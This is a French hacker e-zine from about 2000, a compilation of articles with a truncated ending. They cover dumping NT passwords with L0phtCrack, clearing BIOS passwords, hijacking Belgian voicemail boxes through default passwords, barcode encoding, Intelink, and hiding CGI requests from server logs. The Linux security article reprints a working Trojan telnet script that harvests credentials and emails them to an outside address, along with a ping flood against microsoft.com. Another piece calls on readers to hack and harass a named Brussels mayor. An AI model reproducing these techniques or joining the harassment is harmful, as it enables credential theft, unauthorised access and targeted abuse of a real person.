HKEY_CURRENT_USER\Software\LHI\L0phtCrack\AdminGroupName . Vous devrez mettre le login Administrator dans votre langue ( vue qu'on est francophones : Administrateur). Une fois que vous aurez fait cela vous pourrez dumper la base de registre. Pour cela une option est presente dans le menu tools :Dump password from registry. Et la le miracle de Microsoft se revele a vous... La liste complete des passwords (a cracker bien sur mais ...). Au fait si votre version de NT est en Anglais pas besoin de sniffer!!! Heureusement que je vous le dit hein!!! Donc voila, je crois bien que j'ai fini. J'espere ne pas vous avoir trop fait chier en racontant toutes ces conneries et j'espere surtout que ca vous servira bien. Faites bien chier tous ces cons d'administrateurs NT. \ _:// \\:_ / _)\\//(_ _)\\//(_ ---------- \\_o\/o_/ CyRiUsViRuS \_o\/o_// ---------- |||||| 2000 |||||| '||||' '||||' CyriuSoft (c) _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ************************** * Vidage de la pile CMOS * ************************** Auteur : tRaSH -vidage de pile CMOS : Ouah, j’en reviens pas je viens de sauver mon pc de la casse ! J’avais déjà des problèmes avec (carte son qui marche une fois sur 5, destruction de LILO sans raison, ) mais a ce point, jamais. J’installais les drivers pour ma carte son et quand il redémarra (il ne sait pas le faire seul, il faut appuyer sur «reset » sinon il bloque) l’écran du BIOS avait change OK, jusque là, ca va. Mais les choses se corsèrent quand le démarrage se bloqua sur checking nvram. Plus moyen de démarrer, il bloquait au niveau du BIOS. Pas moyen de : parvenir au BIOS, lancer linux ou windoze même avec une diskette de boot, après une journée a réfléchir, j’ai pense à une astuce, retirer la pile du CMOS, pile qui garde tous les paramètres du BIOS une fois le PC éteint. Cette pile se trouve sur la carte mère, pour l’enlever, j’ai du enlever 2-3 cartes PCI. Elle ressemble à une pile normale (en fait, c’est une pile comme toute les autres, une pile cr2032, mais oui, les grosses rondes, plates) et se trouve souvent a cote des ports PCI. Il faut empêcher un des deux pôles de toucher les contacts. Et voilà, le BIOS est revenu à sa config par défaut, il faut juste tout reparametrer. Avantages : plus de password, plus de bugs,Inconvénients : tout reconfigurer, parfois ça ne marche pas : il se peut que le BIOS soit partiellement ou entièrement détruit, alors il faudra le reflasher avec un diskette. Souvent, on trouve sur les sites de fabriquants des progs a placer sur diskette pour flasher son BIOS. Attention, flasher un BIOS n’est pas chose facile. Si vous ne savez toujours pas démarrer (plus de BIOS du tout), il vous faudra alors trouver qqn qui a à peu près la même carte mère que vous, lui emprunter son BIOS (en prenant son EEPROM BIOS) afin de la mettre [provisoirement] dans votre bécane. OK, votre bécane a démarrée, et après votre copain est dans la merde car il a plus de eeprom ok, activez l’option « cache system bios » dans le bios (celui du copain) et une fois démarrer votre bécane, enlevez le bios du copain pour le remplacer par le vôtre (le tout casse), vous pouvez alors le flasher, le configurer, a oui, dernier conseil, n’oubliez pas de rendre l’eeprom a votre copain ! Ch’tite question : que veut dire BIOS ? Ch’tite réponse : basic input/output system _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ************************************* * Mode d'emploi de la VMB Igloo Ola * ************************************* Auteur : nada Cet article etait en fait un email envoye par nada à Asmodeus pour expliquer le fonctionnement de la VMB. Je vais t'expliquer le fonctionnement détaillé de cette VMB qui est bien belge. Il y en a certaines qui sont en français, d'autres en flamand et certaines en anglais. N° de téléphone : 0800/99707 (igloo-ola, service consommateur) Si c’est un répondeur (welcome bij igloo ola...) c’est bon, on continue. Si c’est quelqu’un qui parle (allo ?) c’est pas bon, il faut réessayer plus tard. Donc, si c’est un répondeur, on appuie sur *. Une femme parle, on appuie sur #. Là, ça demande un n° de boîte vocale. Ceux-ci sont en quatre chiffres. Si on tombe sur une boîte déjà occupée (ça dit un nom) alors faut essayer un autre n°, le but étant de créer une boîte bien à nous. Si quand on a donné le n°, ça nous explique ce qu’est un service de messagerie, c’est bon, on a réussi a trouvé un nouveau n° qui n’était pas encore attribué. Malheureusement, certaines boîtes sont en néerlandais, c’est pour ça que j’explique le fonctionnement détaillé de la boîte. Là, elle va demander le mot de passe temporaire. C’est toujours le n° de la boîte (sauf boite 9999 et 9998, ils ont changé :( ) (ex : boîte 5555, mot de passe provisoire : 5555). On le tape puis on appuie sur #. Maintenant elle demande que l’on donne un nouveau mot de passe. On le tape puis on appuie sur #. Puis elle demande notre nom, on le dit puis sur # comme d’habitude. Après elle nous demande des options dont on a rien a foutre pour l’instant (ce qu’on veut c’est créer une boîte) donc on dit qu’on veut garder le message du système. Maintenant, elle nous dit un truc dans le genre : « vous n’avez pas de nouveau message ». GENIAL ! ! !, on a notre boîte à nous tout seul ! Voici les options une fois qu’on est dans la boîte. 1 : écouter les nouveaux messages (si il y en a) pendant qu'on écoute le message, on a des options qui peuvent être pratique dans le cas où le mec articule pas! 1 : reculer de 10 secondes dans le message 2 : pause (rappuyer sur 2 pour continuer) 3 : avancer de 10 secondes 4 : aller moins vite :très pratique ;) 5 : renseignement sur le message 6 : aller plus vite 7 : volume moins élevé 8 : volume normal 9 : volume plus élevé on écoute puis après on a comme choix 7. effacer le message 8. répondre au message 9. archiver le message 0. plus d’options 4. réécouter le message 5. renseignements sur la provenance du message et l’heure *. annuler 2 : envoyer un message là elle parle et après le bip il faut dire son message puis appuyer sur #. Ensuite il faut donner le numéro de la boîte à laquelle on veut envoyer le message puis sur # pour l’envoyer immédiatement. A la place on peut appuyer sur 0 pour des options avancées : 0. options avancées. 1. ajouter la mention confidentiel au message 2. ajouter la mention urgent au message 3. obtenir la confirmation du message 4. exiger une transmission différée. * annuler destination 3 : contrôle des messages envoyés à une certaine personne (c’est pour savoir si elle a bien écouté tous nos messages) 4 : options personnelles : 1.fonction d’avis de message ON/OFF 2.gestion 1.établir ou modifier des mots de passe. 2.établir ou modifier des listes de distribution de groupe 3.changer le niveau du menu guide. 3.message d’accueil 1.modifier le message d’accueil personnel 2.créer un message détaillé d’absence prolongée 3.enregistrer son nom. 4.option d’appel 1.établir le 1er horaire. 2.établir le 2ème horaire. 3.établir un horaire provisoire. 5 : redémarrer la session 6 : non attribué 7 : non attribué 8 : écouter le n° de notre boîte vocale 9 : fonction du responsable du système : 1.message à diffusion générale du système 2.message d’accueil du système. 3.message de fin de session du système. 4.attribuer un nom à des listes de diffusion ou en créer une nouvelle. 5.affecter un nouveau nom à un point nodal Le zéro (0) sert toujours soit à faire répéter soit à demander des explications. L’étoile (*) sert toujours à revenir en arrière à annuler ou à quitter. Trucs pour trouver un numéro de boîtes : -ils sont en quatre chiffres. La femme nous prévient si on s’est trompé après 3 chiffres. Exemple : je tape 632 et elle dit numéro incorrect, je peux donc supprimer toutes les boîtes de 6320 à 6329 inclus. Simple non ? Pour ne pas devoir recommencer à chaque fois après 3 numéros de boîtes invalides consécutifs, il suffit d’introduire un numéro de boîte qui est valide après 2 essais et de taper * quand elle demande le mot de passe. Ainsi on peut recommencer sans se faire raccrocher au nez. Quand on tient un bon numéro (la femme nous explique ce qu’est une boîte vocale), pour aller plus vite, il suffit de taper le numéro de la boîte vocale suivi du # puis le nouveau mot de passe suivi du # puis ça fait bip, donc on dit son nom et on appuie 2 fois sur # pour confirmer. Après on appuies sur 1 sur # puis sur 2. Voilà, on a créé la boîte vocale. En résumé, ça fait : Numéro de la boîte mot de passe provisoire # Nouveau mot de passe Bip : nom # # 1 # 2 La boite de Nada : 6415 La boite d'Asmodeus : 6729 La boite de GrIMA : 6754 Voici des numéros de boites : 6270 6280 6394 6399 6338 6202 6201 6729 ---> la mienne <---- 6669 6397 6458 6433 6415 ---> Nada <--- Je sais pas si ils marchent encore tous parce que j'avais tellement foutu le bordel qu'ils ont tout réinitialisé mais bon, il y en a qui marche, c'est sûr. Amuse toi bien. @+ nada _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ******************** * Les codes-barres * ******************** Auteur : CyriusVirus Me revoila. Cet article a pour but de vous apprendre a cracker les codes barres a 13 chiffres qui sont les plus utiliser en Europe. Tout d'abord, un code barre ne contient pas le prix du produit mais un numero qui qui fait reference au produit Bons voyons voir comment sont codes ces codes barres (je part du numero completement a gauche) : 0 a 1 : origine du produit 2 a 11 : le code du produit 12 : le checksum Le checksum se calcul facilement : A=somme des chiffres en position paire (le chiffre a l'extreme gauche est le numero 0). B=somme des chiffres en position impaire*3 checksum= 10- [(A+B) mod 10] ou 0 si [(A+B) mod 10]=0 Un chiffre est representer par 7 barres, il s'agit biensur de son ecriture binaire (noir=1 blanc=0). Cepandant, il ne suffit pas de traduire directement les chiffres en binaire puis de les afficher sous forme de barres (sinon pas besoin de 7 barres 2^7=128). En effet , ils sont codes sinon ca serait trop simple. Un code barres presente 2 parties separees par 5 barres plus longues que les autres, elles apparaissent apres le numero 6 (a partir de 0), il y a egalement des barres plus longues sur les cotes du code barre, voici comment elles sont codees : COTES: 101 {Tout cela en binaire} CENTRE: 01010 Ces barres sont importantes car elles permettent de calibrer le scanner. de plus, il doit y avoir un espace blanc de 10 fois la taille d'une barre sur chaque cotes du codes barres (c'est important). Quqnt aux chiffres, il ya 3 tables pour les coder. Sur la moitie droite, tous les chiffres utilisent la table C Sur laa moitie gauche, les chiffres sont codes avec la table A et B selon une configuration determinee par le chiffre en position 0. Voici les tables: TABLE A TABLE B TABLE C 0: 0001101 (13) 0100111 (39) 1110010 (114) 1: 0011001 (25) 0110011 (51) 1100110 (102) 2: 0010011 (19) 0011011 (27) 1101100 (108) 3: 0111101 (61) 0100001 (33) 1000010 (066) 4: 0100011 (35) 0011101 (29) 1011100 (092) 5: 0110001 (49) 0111001 (57) 1001110 (078) 6: 0101111 (47) 0000101 (05) 1010000 (080) 7: 0111011 (59) 0010001 (17) 1000100 (068) 8: 0110111 (55) 0001001 (09) 1001000 (072) 9: 0001011 (11) 0010111 (23) 1110100 (116) (dans la table A, 0 correspond a 13, dans la B 0 a 39...) Voila la facon d'utiliser les tables pour la premiere moitie du code barre en fontion de la valeur du numero 0 ( la seconde moitie est code avec la table C): #1 #2 #3 #4 #5 #6 0 A A A A A A 1 A A B A B B 2 A A B B A B 3 A A B B B A 4 A B A A B B 5 A B B A A B 6 A B B B A A 7 A B A B A B 8 A B A B B A 9 A B B A B A Bon, pour ceux qui comprenne toujours pas voici un exemple : Le code barre est : 9782501 02186 9<--checksum Calculons le checksum: somme des chiffres en position paires=9+8+5+1+2+8=33 (il ne faut pas calculer le dernier qui est le checksum!!) somme des chiffres en position impaires=7+2+0+0+1+6=16 on calcul (33+16*3) mod 10=1 (mod 10 revient a faire une division et prendre la reste comme resultat) d'ou checksum= 10-1=9 donc c'est bon. De plus,le numero 0=9 donc les chiffres 782501 sont codes comme ce ci : ABBABA et les autres utilisent la table C. Oui,Oui je sais que c'etait difficile pour ceux qui n'ont jamais fait l'umaniter ou la 6eme pour les francais. Voila vous avez appris le fonctionnement des codes barres. Je trouve que c'est plutot cool. Sachez qu'il existe d'autres type de code barre que je connais pas encore. Outro Le moment est venu de faire des greetings. Alors je commence (ca sera pas long) par Asmoseus qui m'encourage toujours pour faire des articles. Grim@ et tout les autres membres de BHZ. FUCK WHIS THE BEST DIE LIKE THE REST :-)))))) [ND Asmodeus][ And stop watching shit moviez aussi hein Cyrius... ] \ _:// \\:_ / _)\\//(_ _)\\//(_ ---------- \\_o\/o_/ CyRiUsViRuS \_o\/o_// ---------- |||||| 2000 |||||| '||||' '||||' CyriuSoft (c) _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ************** * L'Intelink * ************** Auteur : nada -l’Intelink : qui connaît l’Intelink ? Je crois que pas beaucoup de gens (en dehors de la CIA) connaissent l’Intelink (moi-même le connaît depuis que je suis tombé sur une demo sur le site www.topsecretnet.com, c’est à dire pas longtemps). Et pourtant, c’est quelque chose de très grand ! Pour vous faire une idée, c’est une sorte de 2eme internet, un intranet gigantesque réservé au militaire et au gouvernement américain (pour changer) contenant des millions d’informations sur tout : guerre, terrorisme, personnel, Pour y accéder, il faut travailler dans le gouvernement ricain, a n’importe quelle échelle : flics comme sénateurs y ont accès. Anecdote : Monica Lewinsky y a eu accès en tant que «top Secret/SCI » Sensitive Compartiment Information, compartiment d’informations sensible : c’est le plus haut niveau que l’on peut atteindre et c’est en étant comme secrétaire a la maison blanche qu’elle l’a atteint (entre deux relations presidentielles ?). L’Intelink est, comme le net, base sur du tcp/ip et est fait comme internet : avec des serveurs (tournant sous apache,... ), un browser, même des acomptes FTP, un vrai internet autonome. Et oui, il est coupe du net, aucun contact (enfin, c’est ce que les sites disent, peut-être que). Pour y avoir accès, il faut accéder à une borne (emprunte digitale et tout et tout) ou connaître le numéro du serveur ainsi que les pass, extra-securisé mais hackable (nul n’est parfait !) Ce qu’il faudrait, c’est trouver qq. Qui se connecte et lui voler la connexion (beige-box), mais APRES disons 15 a 20 minutes car il y a plusieurs niveaux d’identifications, pas intérêt a tomber à ce moment là. Point de vue technique : protocole : tcp/ip, FTP, telnet, Langage : html Réseaux : SPIRNet, JWICS, a peu près tous les réseaux de la sécurité Moteur de recherche : 6 : AltaVista, FBIS, par Meta-Search , Slick, Webinator, Wer’zit Identification : two-way challenge/response : identification simultanée du serveur et du Client Carte PCMCIA : contenant des infos (niveau d’accès, nom, identification,...) hautement cryptes (pas un XOR de mes couilles, quoi). Le cryptage est constitue par une puce Capstone/Keystone qui inclut les algorithmes DSS, SHA-1, SES et le KEA. (DSS=digital signature Standart, SHA-1=secure hash algorithm, SES=Skipjack encryption standart, KEA=Key exchangeAlgorythm. Le tout constitue le Fortezza. A peine le fortezza sortis, on parle déjà du fortezza plus. Pour activer la carte, il faut entrer un code Pin de 12 chiffres. ARGH Restriction : end-to-end confidentiality : niveau d’accès diffèrent d’un utilisateur a l’autre, un peu comme un FTP où un root n’a pas les même droit qu’un anonyme Chat : et oui, il y en a où on ne parle que de guerre, stratégie, Comme vous pouvez le constater, c’est pas rien et completement coupe du net pas de passerelle, RIEN !NADA ! Voilà a peu pres tout ce que je sais en la matiere, faut dire que la NSA ne laisse pas beaucoup filtrer ses infos et tout est garde secret dans leur ville (avec leur usines, bouffe,...) Au fait, la devise de la NSA ne serait-elle pas «servir en silence » ? _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ************* * Hack defi * ************* Auteur : tRaSH J'organise peinard un meet avec Asmodeus (www.thebhz.org ;-))et vient la question du lieu ! Je pense a Bruxelles avec ses gares, trams, bus, metros, et en plus c'est la capitale de l'Europe et de la Belgique. Je me renseigne et j'apprend que les rassemblement de plus de 3 personnes sont interdits... Comment ca interdit ? C'est le retour du faschisme au pouvoir ou quoi ? En fait, le bourgmestre de bruxelles ville (Baudouin xavier de donnea) a interdit les rassemblements de plus de 3 personne. Attention, il ne faut pas confondre personnes et personnes, un groupe de 25 touristes Japonais seront accepte avec tout les honneurs par contre un "rassemblement" de 4 personnes d'un nationalite qui ne plait pas aux flics (souvent des personnes d'origine immigres) seront controles (papiers, ...) puis enmene au comissariat de police le plus proche ! Je les ai vus a l'oeuvre, c'est pas rien ! leurs controles" sont assez.....agites ! En bref, la politique de donnea est simple : enfermer les elements "salissant la ville" selont ses propos. En clair tout ce qui n'est pas Belges, ne possedant pas un appareil photo et etant a 6/7 sera controle par les flics. C'est du faschisme pur et dur ! Les flics de bxl ne sont pas mieux, l'Euro 2000 a ete une bonne occasion de lacher tout le faschismeet la violence qu'ils ont en eux, tout en accusant les hooligans ils ont pus taper tout ce qu'ils voulaient pour se defouler. On peut croire que je delire mais c'est vrai, la preuve que ca gene les flics que certaines personnes s'en rendent compte : j'en parlait peinard avec un pote (on etait dans un centre commercial) et ont est passes devant une sorte de petite case-a-flics où un keuf narrait ses exploits avec son costume de Robocop (mais oui, les 2 milliards d'investis, c'etait principalemnt pour ca) et nous a entendus. On continue et (ont tournait un peu en rond dans le centre commercial) se retrouve devant nous (dans le même sens de marche). Il s'arrete net dés que je dis 2 milliards (LE chiffre fatidique) et me devisage. Je continue et il fait semblant de rien en regardant une vitrine ...ok. Dés qu'il arrive derriere nous, il recomence a marcher en nous suivant pendant au mois 50 metres (a peine discret, le bourin koi...)on sort du centre et ont va s'assoir un peu plus loin sur un rebord juste derriere un coin ou il sufisait que je penche la tête pour voir l'entree du centre commercial. Il est reste là pendant 15 minutes a nous regarder (ne pouvant rien faire puisque son devoir etait de rester DANS le centre commercial et ne pouvant pas effectuer d'arrestaion en dehors), ont a trace a l'oppose pour pas se faire choper. bref, il essayait de nous filer pour nous choper mais a foire ! En bref, les flics n'aiment pas trop que l'on se rendent compte du fin fond de l'histoire et preferent que les hooligans soit tenus pour responsable de tout ce bordel... Tiens, simple question, que vont-ils faire des tenues robocop et de leur lance-grenade fumnigene, ne risquent on pas de les retrouver dans des manif' (par le plus grand des hasards) ? Alors, hack donnea est une operation que j'ai lance, le but est de faire chier a max de donnea par tout les moyens : hack, phreak, ... Il faut qu'il en chie a MORT ! Le gagnant sera recompense par...rien a part la satisfaction d'avoir fait chier un connard, faschiste. A vos armes, prêt, FEU, DESTROYEZ LE, QUE SA MAISON EXPLOSE, QUE SA FEMME DIVORCE, QUE SON CHIEN SE FASSE ENLEVER, ... debut de l'opperation : 10 septembre 2000, jusque là, envoyez nous les infos que vous avez sur lui. nom : De Donnea prenom : Baudouin Xavier Bourgmestre de Bruxelles _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ******************************* * Securiser son systeme Linux * ******************************* Auteur : Asmodeus Cet article va tenter de decrire les differents types d'attaque que votre systeme peut subir et les differentes manieres de s'en proteger. En gros, un attaquant peut avoir les deux objectis suivants : soit s'introduire dans le systeme (une intrusion) soit le faire planter. L'intrusion : l'attaque n'a pas besoin d'etre tres sophistiquee quand l'attaquant a acces à un hote mal configure ou configure par defaut. Avec un simple scanneur de ports si il voit que, par exemple, votre port ftp est ouvert, il pourra tenter de se connecter là dessus avec les comptes root, guest, test, satan, etc... La premiere protection consiste donc à choisir des mots de passe qu'un attaquant ne purra decouvrir en devinant ou en se servant d'un dictionnaire. Attaque par des programmes : un attaqsuant peut se servir d'un programme pour avoir acces à votre systeme. Le moyen le plus courant actuellement c'est de provoquer des buffer overflows (depassement de tampon) : des qu'un programmeur oublie de fixer une limite superieure aux donnees entrantes dans son programme. Une autre facon de se faire hacker c'est d'attribuer des autorisations qui ne conviennent pas : par exemple autoriser un fichier à etre execute avec le bit SUID alors que tous les utilisateurs peuvent y ecrire. De nombreux programmes sont vulnerables. Consultez les sites http://www.rootshell.com, http://www.security-focus.com, http://www.cert.org, etc... pour des explications sur les faiblesses des programmes et des conseils pour les securiser. Les programmes cheval de Troie : j'ai dejà explique dans BHZ Mag n° 4 comment, en modifiant le PATH dans le login ou dans le fichier .profile on pouvait recupere le mot de passe d'un utilisateur. Extrait de l'article : Par exemple un etudiant ouvre une session sur son compte puis quitte son poste. C'est la que le hackeur arrive : il a acces au compte du branleur.Sans connaitre le mot de passe mais sachant que la victime est un etudiant.Le hackeur peut modifier le PATH dans le login ou dans le fichier .profile du branleur: PATH=/usr/bin:/bin:/usr/local/bin:/sbin:/usr/bin:/usr/local/bin:/usr/X11R6/bin Apres ce changement la commande PATH est executee dans le premier repertoire. Si la commande est introuvable,le processus mis en place cherche dans le repertoire suivant...Maintenant reflechissons un peu : il suffit de creer un script,l'appeler telnet et l'inserer dans le reprtoire home de la victime. Script qui permettrait d'avoir le mot de passe de la victime/branleur.Apres avoir cree ce fichier,il faut fermer la session sans que personne ne s'en rende compte (evitez de faire ca sur le poste a cote de l'admin...) Voici donc un exemple de script cheval de Troie: #! /bin/sh #Trojan Telnet by Asmodeus session echo "Trying $1...."echo "Connected to $1."echo "Escape character is /'^]\'," echo " " echo "Linux 2.0.34." echo " " echo $1login: " read ID echo "password: " read PW echo "Login incorrect." echo "User $ID ands password $PW" | mail asmodeus@mail.be rm $0 kill -9 $PPID Ce script ressemble au programme reel (sauf qu'il ne boucle pas trois fois parce que j'ai pas envie de me faire chier..);le bete utilisateur croit que c'est le vrai programme,le programme(le faux) m'envoie le nom et le mot de passe par e=mail puis le programme se suicide...(rm $0) et tue aussi son processus (suicide collectif ;=) ) (kill -9 $PPID). Afin de reperer facilement les programmes cheval de Troie, utilisez Tripwire (http://www.visualcomputing.com) Les backdoors : j'ai aussi ecrit un article là dessus dans BHZ Mag n°4, je ne repeterai pas la dessus, ces programmes servent, une fois connecte en tangt que root à laisser un moyen de se reconnecter par apres en root. Les denials of service : les attaques de type denial of service (DoS ou DDoS) visent à provoquer un plantage de l'hote. Des qu'un port est ouvert, cela signifie que l'on poeut vous attaquer là dessus. Par exemple : # ping -f micrososft.com 80 Cette commande va pinger le serveur microsoft.com sur le port 80 mais comme ce type d'attaque est en faite un envoi en masse de paquets de donnees, il n'est pas tres difficile de repere l'attaquant en verifiant les logs. Une autre facon d'utiliser les DoS serait de repandre un programme parmi des milliers d'utilisateurs, programme qui s'executerait à un moment precis sur toutes les machines et effectuerait la commande ping. Ainsi l'attaquant en question n'aurait meme pas besoin d'utiliser la commande et les personnes ayant utilise eux cette commande à leur insu seraient beaucoup plus nombreuses. Les daemons : ce sont des processus executes en taches de fond par root. Ils sont souvent la cible des attaquants. C'est pour ca qu'il faut veiller à ne garder que les daemons essentiels au bon fonctionnement du systeme. le nom d'un daemon est souvent "nom du protocole+d" (exemple : le daemon ftpd utilmise le protocole ftp). Analyse des ports : c'est generalement une des premieres etapes pour un hackeur que de tester les ports ouverts sur un hote distant. nmap sert à analyser les ports, il utilise le fichier /etc/services. Desactivation de certaines commandes : des commandes comme rlogin, rsh et rcp sont inutiles car elles peuvent etre remplacees par d'autres, notamment SSH (Secure Shell). Afin d'etre toujours au courant des failles de securite de logicielos, je vous conseille de vous abonner à des mailing-lists (listes de diffusion) concernant la securite des systemes UNIX ou Linux. Cryptographie : comme cela fait partie du theme de cet article, je vais en parler un peu : il existe deux methodes de cryptographie : cryptographie à cle symbolique (les deux personnes ont la meme cle) et cryptographie à cle publique (la cle est divisee en deux parties). PGP et Secure Shell utilisent tous les deux les cles symboliques comme methode de cryptage. Les fichiers journaux : si vous avez des doutes à propos d'une intrusion ou autre chose, verifiez les fichiers suivants : /var/adm/messages/ et /var/adm/syslog/. Si on reprend tout depuis le debut : il existe deux differents types d'attaques, il vous faut accorder les bonnes autorisations aux fichiers avec la commande chattr, il est conseille d'utiliser la cryptographielors des connections de donnees, il vous faut securiser vos sessions aves Secure Shell et vos mails avec PGP, vous abonner à des listes de diffusion concernant la securite de votre systeme ou visiter regulierement des sites qui en parlent. _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ******************************** * les requests des scripts CGI * ******************************** Auteur : wHyAnGeL Date : 04.08.00 Titre : Les request des scripts CGI. Les request sont des demandes faites par la machine cliente. Cet article démontre quelques exploits en raport avec les CGI. C'est une caractéristique inhérente propre à quelques serveurs web, tel que Apache 1.3.x ou Microsoft IIS. Ces légers transports d'implications de sécurité autoriseraient des attaques invisibles, donc intraçables aux serveurs web. Le problème associé aux "allowable" REQUEST_METHODs (les méthodes de demandes autorisées) quand une ressource dynamique, tel qu'un script CGI est demandé. Essentiellement toutes les méthodes de demandes (excepté HEAD, TRACE et OPTIONS) peuvent être utilisées, même les méthodes non définies dans le protocole HTTP. Envisagez que la demande qui suit retourne toutes les ressource demandées : GET /cgi-bin/environ.cgi HTTP/0.9 Azx5T8uHTRuDL /cgi-bin/environ.cgi HTTP/1.0 Même le contrôle des caractères est permis, alors envisagez ceci : ^H^H^H^H^H^H^H^H^H_ENCORE_BEAUCOUP_PLUS_^H^H /cgi-bin/environ.cgi HTTP/1.1 Un attaquant (un script kiddie) pourrait émettre cette demande dans l'intention de cacher ces mouvement sur l'hôte. Quand cette demande est loggée dans l'access log et visionnée en utilisant 'cat' , et, les script visités apparaîtront sans votre IP. # cat /var/log/httpd/access_log ou # more /var/log/httpd/access_log Ces deux commandes citées ci-dessus révellent : 10.20.20.1 - - [05/Jan/1999:18:00:00 GMT] "GET / HTTP/1.0" 200 1098 /cgi-bin/environ.cgi HTTP/1.1" 200 2034 10.20.20.2 -- [05/Jan/1999:18:01:00 GMT] "GET /index.html HTTP/0.9" 200 1098 Utilise une méthode similaire, si c'est possible, pour un attaquant pour faire apparaître l'attaque comme si elle provenait d'une autre IP ou pour enlever complètement les vraies informations loggées en désignant un certain contrôle de caractère dans la QUERY_STRING aussi (la ligne de demande de restitution d'information extraite d'une banque de donnée). Je l'ai testé sur Apache 1.3.3, sur RedHat 5.2, sur Apache 1.2.7, sur RedHat 5.0, Microsoft's Internet Information Server 2, 3 et 4, mais dans l'environement NT, ce n'est pas nécessaire, parce que l'on peut éditer le fichier log avec notepad et par là, effacer toute traces de passages. _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ *********************************** * La chtite pensee anarchique n°2 * *********************************** \\\|/// -(o o)- £___________________oOOOo__(_)__oOOOo_________________£ £µ\ «««««««« ¡ Underground Production ¡ »»»»»»» /µ£ £µµ/---------------------------------------------------\µµ£ £µµ/ [ La chtite pensée ananarchique 2 Le RETOUR ] \µµ£ £µµ\ GRIm@, L'Apprenti Sorcier Proudly Present /µµ£ £µµ\---------------------------------------------------/µµ£ £µ/LES NEWBIES D'AUJOURD'HUI SONT LES 3L33T3 DE DEMAIN\µ£ £\___________________________________________________/£ [adminn@remotehost]# m0D3 0n: G3l4p4 d0N3 [gelapa@remotehost]# M0d3 0N: wH4T d4 FuCk D0n3 [gelapa@remotehost]# k1lL 3cR1tUr3 d3 C0wB0y5... Done [gelapa@remotehost]# launch cervaux... Done Hé oui, me revoilà !!! Cette fois-ci zéte foutu... Aprés ce superbe ASCII encore mieux que la fois derniére, revoici revoilà la chtite pensée ananarchique !?! Arf, le concept reste le même (voir BHZ mag #6), mais cette fois-ci je vais vous parler d'un truc tout a fait sérieux (barf, mais toujours avec humour léger et discret (vous êtes foutu, je l'ai dit)... ADISCLAIMER ---------- Ce texte contient de vrai morceaux de connerie, s'il vous prend l'envie d'être con, c'est votre probléme... Ce texte est légal (pour autant que je sache, mais on sait jamais ;-) ) --------------- EOF ADISCLAIMER Comme d'hab il est déconseillé d'utiliser des aditifs avec cet articles, genre bon sens, intelligence, esprit critique et autres... Je vous conseille donc de débrancher ces plugin inutile et emcombrant pour votre esprit afin de libérer quelques cycles CPU... System 2 System (or what da feucking syst3m) Mais vous aller me dire de koi vas-t'on parler ? ben oui, j'ai dit qu'on parlerai de qqchose de sérieux, mais n'ayez aucune crainte, ca SERA TRéS ennouyeux ;-). Bref pour en venir au fait et ne pas discourir dans le vide sans but ni echapatiore, ainsi que pour ne pas vous faire attendre ni se dérober nous allons parler de... tadam... (jvous l'ai dit, VOUS ETES FOUTU !!! :-)..) Le Projet Copernic !!! Pour ceux qui savent pas ce que c'est voici un petit encart qui vous est destiné (les autres sauté le, enfin pas littéralement si possible): --------------------------------------------------------------------- Le Projet Copernic est encore un belgicisme risible qui fait que les blagues sur nous marchent si bien. En effet, certain ministre dont je ne citerai pas la nom (et encore moins le parti; PD !! HAHA kel con ce duqenne ;-) se sont dit qu'il serait peut-être temps de dépoussierez l'administration. Arf, tout a fait d'accord avec eux, remmetre a niveau une administration vielle de 2 siécles il faut le faire. Mais alors con comme il sont, il ont envoyé a presque tous les belges de plus de 16 ans un questionnaire avec des questions (non, vraiment ???). Ce n'était ni un référendum, ni une pub, juste une double feuille avec des questions sur le fonctionnement de l'administration que nous pensions devoir avoir... (Note, y'a eu 7 millions de forumlaires envoyé sur 10 millions d'habitants) Bref, on continue: --------------------------------------------------------------------- Donc ces chers ministres arc-en-ciel nous envoient leurs putains de questionnaires qui vont couter 10 millions à l'état. Mais voilà, le questionnaire est bourré d'incohérence, de fausses questions, ainsi que de question pas trés claires et des truc un peux bizzare. Ayant recu ce questionnaire, je vous file une copie des questions: (Y'avais 2 feuilles, voici la premiére, aprés la deuxiémes:) Note: chaque question était accompagnée de 5 case à cocher, -tout à fait d'acord -d'accord -sans opinion -pas d'accord -pas du tout d'accord sensée représenté l'avis général et entier de la personne sur le sujet... Note2: Sur la deuxiéme feuille seule la question 1 avait ce type de réponse, j'ai noté le type de cotation pour les autres questions ---------- | | Donnez votre opinions sur les orientations du plan: | .BE | |Belgique| ---------- 1. Le gouvernement doit établir les lignes de force mais les | Le Plan| fonctionnaires peuvent décider eux-mêmes pour la gestion | | journaliére |COPERNIC| | | 2. Les fonctionnaires de l'administration sont désigné pour | | période limitée (titulaires de mandat). | | | | 3. L'administration publique veut attirer les collaborateurs | | les plus compétent pour ces fonctions dirigeante et doit | | s'ouvrir au candidats tant internes que externes. | | |pour la| 4. Les personnes exerçant une fonction dirigeante doivent |moderni-| être évalué en fonction de leurs résultats. Ces résultat |sation | à atteindre sont définis au préalable |de l' | |admini- | 5. Les cabinets sont supprimé et remplacé par des cellules |stration| stratégiques au sein de l'administration et par un petit |fédérale| secrétariat personnel au service de chaque ministres | | 6. Chaques service fédéral doit donner des garanties de | | qualités pour la fourniture de service |________| ---------- | | 1. Le 